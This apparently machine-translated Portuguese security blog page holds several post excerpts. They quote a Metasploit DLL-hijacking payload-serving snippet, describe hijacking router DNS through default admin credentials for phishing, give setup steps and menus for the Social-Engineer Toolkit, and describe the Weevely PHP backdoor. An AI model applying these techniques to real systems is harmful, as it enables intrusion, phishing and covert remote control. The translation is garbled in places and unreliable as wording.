ClsHack:Computer Security Blog    

Mais informações sobre esta vulnerabilidade, podemos encontrar aqui:

[DLL hijacking] Windows 7 e uma aplicação mais Exuction código remoto => metasplooit

Vejamos agora como aplicações vulneráveis :D

Sempre na acima mencionada, Eu mostrei como você pode explorar com a vulnerabilidade Metasploit, usando webdav, mesmo remotamente.

L'exploit creato da HD Moore, desenvolvedor metaploit é muito simples.
O código que nos interessa é:

                if (request.uri =~ /\.(dll|dl|drv|cpl)$/i)
                        print_status("#{cli.peerhost}:#{cli.peerport} GET => DLL Payload")
                        return if ((p = regenerate_payload(cli)) == nil)
                        data = Msf::Util::EXE.to_win32pe_dll(framework, p.encoded)
                        send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
                        return
               end

(mais…)

Em muito poucos, alterar a senha para o roteador -. -’ por conveniência de sair do padrão, que fácil de lembrar o.o

Usuário: administrador
Senha: administrador

Assim, se o roteador é acessível a partir de, ou se um utilizador, capaz de entrar em nossa rede pode alavancar dns realizar ataques direcionados ao seu PC :D
Os ataques variam de phishing:
Wiki:

No campo da segurança do computador, phishing é o processo criminalmente fraudulenta de tentar para adquirir informações sensíveis, tais como nomes de usuários, senhas e detalhes de cartões de crédito por que aparece como uma entidade confiável em uma comunicação eletrônica. Comunicações que pretendem ser de populares sites sociais, sites de leilões, processadores de pagamento online ou administradores de TI são comumente usados ​​para atrair o público desavisado. Phishing é normalmente realizada por e-mail ou mensagens instantâneas.

até para assumir o controle remoto do PC da vítima :D

Tudo isto utilizando o DNS.
Quando podemos ir para o roteador, além de alterar o SSID de wi-fi “O que um idiota que sie” / “Você é um merda” e lixo vário nós podemos mudar o dns.
Por exemplo, eu Google Aqueles o.o

Eu servidor dns, vulgarmente falando, fazer nada, mas devolver o ip do site para o qual estamos nos conectando, por exemplo, se digitar www.clshack.com:
; < <>> DiG 9.7.0-P1 < <>> www.clshack.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER< <- opcode: QUERY, status: NOERROR, id: 29740
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;www.clshack.com. IN A
;; ANSWER SECTION:
www.clshack.com. 31 IN A 94.141.22.26
;; Query time: 127 msec
;; SERVER: 8.8.8.8#53(8.8.8.8)
;; WHEN: Thu Aug 19 19:12:04 2010
;; MSG SIZE rcvd: 48
Ele retorna:
94.141.22.26
(mais…)

O Social-Engenharia Toolkit (SET) foi produzido por David Kennedy e colocar à disposição o atacante explora alguns notáveis, A engenharia social do tipo com uma interface conveniente :D

O objetivo principal da SET é a automação de tais ataques, quase sempre usando a estupidez humana.

Vamos ver como usar.
sudo apt-get install python-pexpect
Precisamos fazer uma ligação simbólica de outra forma não fixar se não recuar 4:
sudo -s
mkdir /pentest
mkdir /pentest/exploits/
mkdir /pentest/exploits/framework3/
sudo ln -s "WHERE_IS_METASPLOIT/*" /pentest/exploits/framework3/
Por exemplo:
sudo ln -s /home/clshack/msf3/* /pentest/exploits/framework3/

Nós entramos no terminal, e nós o download da última versão:

svn co http://svn.secmaniac.com/social_engineering_toolkit SET/
cd SET
sudo ./set
Uma vez aberto, teremos um menu um pouco’ lamerico -. -’


1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious USB/CD/DVD Generator
4. Update the Metasploit Framework
5. Update the Social-Engineer Toolkit
6. Create a Payload and Listener
7. Mass Mailer Attack
8. Help, Credits, and About
9. Exit the Social-Engineer Toolkit

Vamos ver em detalhes as opções.

1. Spear phishing-Vetores de Ataque
Digitando 1, teremos substancialmente 3 opções:

• Executar um ataque de email em massa
• Criar um Payload FileFormat
• Criar um modelo de engenharia social

(mais…)

Weevely é uma ferramenta desenhada para criar e gerenciar um backdoor escondido no remoto servidor php.

Weevely criptografa as comunicações entre cliente e servidor nos campos HTTP_REFERER plausível para esconder-se em pesquisa e NIDS logs do servidor web.
Weevely permette di:

PHP Backdoor gerar dinamicamente o criptografado

• Executar comandos no shell remoto, pedidos ofuscante dentro plausível HTTP_REFERER
• Simulação de um terminal para enviar comandos para o shell remoto como acima
• Evite algumas configurações do PHP que restringem a execução de comandos no sistema
• Módulos de executar na máquina remota para automatizar tarefas.
• Adicionar novos módulos de forma rápida e facilmente

Scritto em python e código aberto.
Para a instalação no Debian / Ubuntu:
sudo apt-get install python-numpy
(mais…)

Segurança menos… quem é a culpa ? Quase sempre o nosso… Por exemplo, um idiota H4, um pó’ tempo atrás, ele entrou para o blog do nosso amigo sskull.

Como fez ?

Com um ataque de força bruta, nosso amigo sskull alguns tinham deixado uma senha’ muito fraco e que a criança entrou merda…
(mais…)